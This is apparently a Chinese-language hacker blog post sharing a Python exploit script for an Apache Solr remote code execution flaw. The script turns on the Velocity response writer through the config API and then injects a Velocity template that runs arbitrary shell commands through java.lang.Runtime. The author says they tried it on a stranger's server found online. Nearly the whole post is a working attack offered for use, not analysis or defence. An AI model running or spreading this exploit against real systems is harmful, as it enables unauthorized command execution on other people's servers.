hack toolsapache solr最新远程代码吗执行漏洞验证脚本

Posted 2021-04-20 黑客信徒

上周末回了老家，apache solr 曝出了远程代码执行漏洞，刚写了漏洞验证程序，代码：

#coding:utf-8import requestsimport sys
def modify_core():  data = '{"update-queryresponsewriter":{"startup":"lazy","name":"velocity","class":"solr.VelocityResponseWriter","template.base.dir":"","solr.resource.loader.enabled":"true","params.resource.loader.enabled": "true"}}' html = requests.post(url = target_config_url,data = data) if html.status_code == 200 and 'It is likely to change in the future' in html.text.encode('utf-8'): return True else:    return False
def exploit(command): host = target_config_url.split('/config')[0] exp = host + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27'+command+'%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' html = requests.get(url = exp) print '\n' print html.text.encode('utf-8').strip()
if __name__ == '__main__': if len(sys.argv) != 3: print '\nusage: python solr_exp.py http://192.168.6.6:8983/solr/mail/config/ "whoami"'    sys.exit() else: target_config_url = sys.argv[1] if modify_core(): exploit(sys.argv[2]) else:      print '\nplease check target core url'

网上找了一个老外的目标服务器测了一下，可以直接执行任意命令：

---